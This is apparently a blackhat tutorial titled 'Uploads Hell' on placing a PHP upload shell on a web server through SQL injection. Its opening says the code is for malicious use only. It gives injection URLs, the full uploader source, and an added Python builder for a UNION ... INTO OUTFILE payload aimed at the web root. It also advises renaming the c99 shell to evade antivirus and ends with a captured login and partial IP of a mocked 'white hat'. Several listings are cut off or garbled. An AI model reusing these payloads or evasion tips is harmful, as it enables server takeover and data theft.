8/12/2019 Uploads Hell
Table of Contents
1.0 Getting Started
1.1 Claimant - A little piece of advice
1.2 Acknowledgement - encore!
1.3 Really getting started
2.0 MySQL
2.1 Connecting to
2.2 Creating the database
2.3 Creating the table
2.4 Inserting data
3.0 - Seeing how the page works - (awkward situation)
4.0 - Exploiting
5.0 - Selecting
6.0 - Hexadecimal Party
7.0 The Uploader
7.1 Some little problems
7.2 Give me the hex codes
8.0 - The Spider Shell
9.0 - Ending
A.0 - Bonus chapter
B.0 - References
1.0 - Getting Started
1.1 Claimant - A little piece of advice
Paper destined to any blackhat on the internet, all source codes and examples must be used for malicious purposes only, sue me for that. Learn with this short piece of information how things work, 'cause we drift toward war... despite the fact that white hats also fight against us (reporting our fake pages and being prone to identify us to the federals) we still can win the struggle, despise the other side. With a scalpel in our hands we'll overcome the fucking security-revealing scandals around the world, inhale the white hat powder. Where do we fit into that? The best thing about this little piece of spam is that it appeals to our blackhat hearts.
1.2 Acknowledgement - encore!
I offer this paper to FrG0, DarkooDoo, Cheat Struck, dizziness, blurred vision, eye or muscle twitches and loss of consciousness :) and mainly to Cleidiane Morais for being in a good mood to love on a moonlit day ;) My nape hurts! The cheat in this paper works perfectly on Windows ..., Windows Vista, Windows ..., Windows 8 and 9 and etc. (of course B) I will do this in steps for no readily apparent reason besides giving the reader motion and emotion... with no repentance it will be cool...
T&e ke" to "o*r s*ccess is acting before t&e problem escalates.
1.3 Really getting started
Let's write an index page, or a simple page able to deal with SQL injection. Do a roaring trade (new employees...). But if you want, rename it as roastbeef.php

-- index.php --
<html><head><title>Index Vulnerable</title></head><body bgcolor=white><?php
mysql
while ($row = mysql
[rest of the index.php listing is cut off in this copy]

2.2 Creating the database
mysql> create database infobnk;
Query OK, 1 row affected (0.00 sec)

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| infobnk            |
| mysql              |
| test               |
+--------------------+
4 rows in set (0.00 sec)

mysql> use infobnk;
Query OK, 0 rows affected (0.00 sec)
2.3 Creating the table
mysql> create table information (id int, name text, cc text, validade text, rg text);
Query OK, 0 rows affected (0.01 sec)

mysql> desc information;
+----------+---------+------+-----+---------+-------+
| Field    | Type    | Null | Key | Default | Extra |
+----------+---------+------+-----+---------+-------+
| id       | int(11) | YES  |     | NULL    |       |
| name     | text    | YES  |     | NULL    |       |
| cc       | text    | YES  |     | NULL    |       |
| validade | text    | YES  |     | NULL    |       |
| rg       | text    | YES  |     | NULL    |       |
+----------+---------+------+-----+---------+-------+
5 rows in set (0.00 sec)

mysql>
(validade is Portuguese for validity, the card's expiry; rg is the Brazilian ID-card number.)

2.4 Inserting data
mysql> insert into information values (1, 'Tom Cruise', 'Visa, Numero [statement cut off in this copy]
3.0 Seeing how the page works - (awkward situation)
http://localhost/?id=1
Example II:
http://localhost/?id=2
Page vulnerable to SQL Injection (no scant) - Vulture Demonstration
==============================================
SQL Query: SELECT * FROM information WHERE id='2'
Name: blah   CC#: blah   Expiry date: blah   RG: blah
Without using anything beyond URL manipulation we can change the data shown on the page; let's test the SQL injection properly said right now.
4.0 - Exploiting
You may have noticed that after we insert the apostrophe sign we get the following error message:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in D:\Arquivos de programas\EasyPHP-5.3.1\www\index.php on line 21
That means we can do a little party here :) Surprisingly we say yeeeah. As you guys can notice, the main focus of this paper isn't to explain how SQL injection works, but simply to show how to upload a PHP shell through it; still, I will explain some basics for you, so let us continue the trek...
Try this too: http://localhost/?id=2'+or+1=1--+
Good spice! Respectively surrounded with colored circles you can see the corresponding data for each id. That's a good crop. When talking about SQL injection remember the select statement.

5.0 Selecting
As you may be tired of knowing, SELECT is used to retrieve rows selected from one or more tables, and can include UNION statements and subqueries. For more information regarding them see reference [1], but this structure carries the information we need about the number of columns, as you know, because of the UNION statement. So, let's do it right away:
http://localhost/?id=1'+order+by+1--+   No errors shown
http://localhost/?id=1'+order+by+4--+   Continue like that
http://localhost/?id=1'+order+by+5--+   Nothing in here
http://localhost/?id=1'+order+by+6--+   See the message below
Ok, the table has 5 columns. So let's finally test the select statement.

6.0 - Hexadecimal Party
I have not personally seen this book, and I believe it may not be available (anymore); I simply thought about this method and it ran perfectly, so let us begin...
See this:
http://localhost/?id=1'+UNION+ALL+select+1,0x41414141,2,4,5--+
Instead of showing 41414141 it was shown AAAA, which means the server interprets the hex code as a string when it is preceded by the hex specifier '0x'. Now think about SELECT ... INTO OUTFILE, the statement behind the bug in MySQL 3.23.55 and earlier that created world-writeable files and let mysql users gain root by overwriting a configuration file so that mysql ran as root on restart. Yes, we really can upload a PHP shell through the index page.
1 - hex digits for the string AAAA
2 - hex digits for the immortal Inconspicuous Uploader
As you can notice we don't see anything shown in field 1, because of the source code of this index page (of course). For that reason I have selected field 2. So we just need a shell and to select the hex digits of it into a file inside the directory
D:\Arquivos de programas\EasyPHP-5.3.1\www
As you also know 'www' is the directory for putting the web pages... as well ;) But it isn't so easy to get these hex digits for the shell :) you may think... but I'm here to show you how it works. After clicking on 'Procurar...' (Browse...) you'll be immediately redirected to a file-chooser window like the one below.
Select a file, in my case an image. After that open it and click on 'Enviar arquivo' (Send file).
The message above is saying that O arquivo [... cut off in this copy] (Portuguese: the file ...).
For some stupid reason I inserted the following path inside the PHP uploader:
mysql> select load_file('D:/uploader.php');
+------------------------------------------------------------------------+
| load_file('D:/uploader.php')                                            |
+------------------------------------------------------------------------+
| (more trash)
<html>
<!-- Inconspicuous Uploader 2.5 by _lck=_f0 -->
<form enctype="multipart/form-data" action="uploader.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="2000000"/>Arquivo local: <input name="arquivo_local" type="file"/><br/><br/><input type="submit" value="Enviar arquivo"/></form></html>
<?
$path = "uploaded_files/";$path = $path.basename($_FILES['arquivo_local']['name']);
if (isset($_FILES['arquivo_local']['name'])) {
if(move_uploaded_file($_FILES['arquivo_local']['tmp_name'], $path)) {
echo "O arquivo <b>".basename($_FILES['arquivo_local']['name'])."</b> foi enviado com sucesso.";
} else {
echo "Ocorreu um erro ao enviar o arquivo <b>" .basename($_FILES['arquivo_local']['name'])."</b> tente novamente.";
}}
?>
 |
+------------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql>
(The form labels are Portuguese: "Arquivo local" is "local file" and "Enviar arquivo" is "send file"; the two echo strings say "The file <name> was sent successfully." and "An error occurred while sending the file <name>, try again." Note that the script reads $_FILES['arquivo_local']['name'] before the isset() check, and that it writes into uploaded_files/ relative to itself, so that directory has to exist and be writable by the web server account for the upload to succeed.)
7.1 - Some little problems
Ok, this uploader needs to become a hex string, but there's a little problem here; learn how to bypass it. You may ask: ok, there's a problem, but how does it affect the hex code?
mysql> select load_file('D:/uploader.php') into outfile 'D:/output.txt';
Query OK, 1 row affected (0.00 sec)
As you could see in the video [1] there are some backslashes when we use the load [sentence cut off in this copy]
(Those backslashes are INTO OUTFILE's doing: with the default FIELDS ESCAPED BY '\' it prefixes every tab, newline and backslash in the value with a backslash and writes NUL as \0, so a multi-line file does not come back byte for byte. A script on one line leaves nothing to escape; INTO DUMPFILE, which writes a single row raw with no terminators and no escaping, is the other way around it.)
To avoid this annoying problem just put all the code on the same line and process it after that:
<html><!-- Inconspicuous Uploader v2.5 by [one-line listing cut off in this copy]
[hex digits of the one-line uploader as pasted into the UNION payload; they are garbled beyond recovery in this copy]
By using notepad you can't copy the last character, 'cuz that's a null byte.
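The chain from sections 4.0 to 7.2 end to end, as an added example that is not part of the paper or of its uploader. The paper's five-column `information` table is rebuilt in SQLite so the block runs offline (the rows are made up), `vulnerable_page` imitates the index.php lookup that pastes `?id=` into a quoted literal, `count_columns` is the ORDER BY oracle of section 5.0, and `build_outfile_payload` turns a one-lined copy of the uploader into the `0x...` literal of section 6.0 and the `UNION ALL SELECT ... INTO OUTFILE` query string. The hex literal and INTO OUTFILE are MySQL behaviour, so they are only built here, not run against SQLite; the web-root path is taken from the paper's error message. `fixed_page` is the one-line repair of the page: bind the parameter and the same input matches nothing. All function names, the sample rows and the trimmed `UPLOADER_PHP` are this example's own.

```python
import sqlite3

# Constructed stand-in for the paper's lab: the five-column table of section 2.3
# in SQLite instead of MySQL so this runs offline. The row data is made up.
ROWS = [
    (1, "Tom Cruise", "Visa 0000-0000-0000-0001", "12/2009", "0000001"),
    (2, "Jane Doe", "Visa 0000-0000-0000-0002", "01/2010", "0000002"),
]

# Trimmed copy of the paper's uploader, used only as sample input for the encoder.
UPLOADER_PHP = """<html>
<form enctype="multipart/form-data" action="uploader.php" method="POST">
<input name="arquivo_local" type="file"/><input type="submit" value="Enviar arquivo"/>
</form></html>
<?php
$path = 'uploaded_files/' . basename($_FILES['arquivo_local']['name']);
if (isset($_FILES['arquivo_local']['name'])) { move_uploaded_file($_FILES['arquivo_local']['tmp_name'], $path); }
?>
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table information (id int, name text, cc text, validade text, rg text)")
    db.executemany("insert into information values (?,?,?,?,?)", ROWS)
    return db


def vulnerable_page(db, user_id):
    # index.php as the paper shows it: ?id= is pasted into a quoted literal.
    sql = "SELECT * FROM information WHERE id='%s'" % user_id
    return db.execute(sql).fetchall()  # malformed SQL raises sqlite3.OperationalError


def fixed_page(db, user_id):
    # The repair: a bound parameter is data, so "2' or 1=1-- " matches no id at all.
    return db.execute("SELECT * FROM information WHERE id=?", (user_id,)).fetchall()


def count_columns(page, max_cols=20):
    # Section 5.0: ORDER BY n is accepted while n <= column count and errors past it.
    for n in range(1, max_cols + 1):
        try:
            page("1' order by %d-- " % n)  # the -- comments out the closing quote
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("more than %d columns" % max_cols)


def one_line(php_source):
    # Section 7.1: collapse the script to one line so OUTFILE's newline escaping
    # never applies (the input must not use // comments), and section 7.2: drop
    # the trailing NUL that a text-editor copy may carry.
    lines = php_source.rstrip("\x00").splitlines()
    return " ".join(line.strip() for line in lines if line.strip())


def hex_literal(text):
    # Section 6.0: MySQL reads 0x41414141 in a string context as 'AAAA'.
    return "0x" + text.encode("utf-8").hex()


def decode_literal(literal):
    # What the server sees once it has interpreted the 0x prefix.
    return bytes.fromhex(literal[2:]).decode("utf-8")


def build_outfile_payload(base_id, ncols, reflect_col, php_source, outfile):
    # The paper's UNION: the hex string goes into the column the page reflects
    # (column 2 in the paper) and INTO OUTFILE writes the row to disk as a file.
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[reflect_col - 1] = hex_literal(one_line(php_source))
    sql = "%d' UNION ALL SELECT %s INTO OUTFILE '%s'-- " % (base_id, ",".join(cols), outfile)
    return "id=" + sql.replace(" ", "+")  # same +-for-space form as the paper's URLs


def demo():
    db = make_db()
    ncols = count_columns(lambda s: vulnerable_page(db, s))
    dumped = vulnerable_page(db, "2' or 1=1-- ")  # section 4.0: every row comes back
    blocked = fixed_page(db, "2' or 1=1-- ")      # parameterised: nothing matches
    payload = build_outfile_payload(
        1, ncols, 2, UPLOADER_PHP,
        "D:/Arquivos de programas/EasyPHP-5.3.1/www/uploader.php")  # web root from the paper
    return ncols, len(dumped), len(blocked), payload


if __name__ == "__main__":
    print(demo())
```

`demo()` returns the column count (5), the number of rows `2' or 1=1-- ` dumps from the vulnerable page (2), the number the parameterised page returns for the same input (0), and the payload string. Before expecting the OUTFILE step to work outside the paper's lab: the database user needs the FILE privilege, INTO OUTFILE refuses to overwrite an existing file, `secure_file_priv` limits (or, when NULL, forbids) where it may write, and the account mysqld runs as must be able to create files in the web root. A MySQL run as administrator on a Windows test box, as in the paper, meets all of these; a production install usually meets none.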
8.0 - The Spider Shell
Unfortunately the c99 is being detected by some antivirus and stupid security tools; for that reason write a simple shell yourself or try renaming c99.php to cnineninel.php hhahahash! stupid white hats, you worthless sack of pillow stuffing
9.0 - Ending
Have a nice day guy, now I'm gonna eat a delicious yeast cake. *more words*.
Até a próxima (until next time)

A.0 - Bonus chapter, tracing a stupid indian white hat
Correo / Usuario: test@testing.com  Clave: thisisatest  Direccion IP: 200.1?.1?0.21
(Spanish: Email / User, Password, IP address; two digits of the address are unreadable in this copy.)